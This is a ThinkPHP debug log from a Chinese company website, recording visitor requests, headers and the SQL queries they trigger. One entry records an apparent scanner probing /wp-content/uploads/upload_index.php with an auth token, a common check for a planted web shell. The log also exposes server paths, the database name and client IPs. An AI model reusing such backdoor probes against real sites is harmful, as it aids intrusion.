`product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:02+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,693.41kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,5,1,3) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:11+08:00 ] 61.158.208.168 POST /api/index/procontent [ info ] www.kinsana.cn/api/index/procontent [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,711.20kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'procontent', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '6', 'referer' => 'http://www.kinsana.cn/m/cpxq.html?id=127', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/procontent' => '', 'id' => '127', ) [ info ] [ RUN ] app\api\controller\Index->procontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` `a` INNER JOIN `type` `c` ON `a`.`type_id`=`c`.`id` WHERE `a`.`id` = '127' LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:25+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,703.55kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '1', 'type_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 1 AND `type_id` = 3 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:29+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,704.53kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '1', 'type_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 1 AND `type_id` = 5 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:32+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,711.21kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '1', 'type_id' => '8', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 1 AND `type_id` = 8 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:36+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,691.93kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/scycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '4', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 4 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (9,8) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:36+08:00 ] 61.158.208.168 POST /api/index/scpro [ info ] www.kinsana.cn/api/index/scpro [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,731.47kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'scpro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/scycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/scpro' => '', ) [ info ] [ RUN ] app\api\controller\Index->scpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 4 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:33:45+08:00 ] 61.158.208.168 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,387.38kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:33:45+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,696.34kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:34:09+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,708.18kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '6', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 6 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:34:13+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,710.00kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:34:21+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,755.31kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '7', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 7 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:34:27+08:00 ] 61.158.208.168 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,016.88kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'cookie' => 'safedog-flow-item=', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:44:30+08:00 ] 220.249.46.126 GET /index/news/xwxq/id/175.html [ info ] www.kinsana.cn/index/news/xwxq/id/175.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,170.55kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/175_html' => '', 'id' => '175', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 175 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 175 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:51:11+08:00 ] 185.191.171.8 GET /index/news/hydtnews.html?page=6 [ info ] xn--vhqsn14am88k.com/index/news/hydtnews.html?page=6 [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,083.75kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'hydtnews', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/hydtnews_html' => '', 'page' => '6', ) [ info ] [ RUN ] app\index\controller\News->hydtnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\hydtnews.htm [ array ( 0 => 'newRes', 1 => 'page', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `news` WHERE `cate_id` = '2' AND `state` = '1' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 40,8 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:53:42+08:00 ] 142.44.251.105 GET /wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L [ info ] xn--vhqsn14am88k.com/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.61kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'uploads', 2 => 'upload_index.php', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'host' => 'xn--vhqsn14am88k.com', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', ) [ info ] [ PARAM ] array ( '/wp-content/uploads/upload_index_php' => '', 'auth' => 'f02pz3831W0DTtLgq26L', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T18:57:50+08:00 ] 183.136.225.56 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.61kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 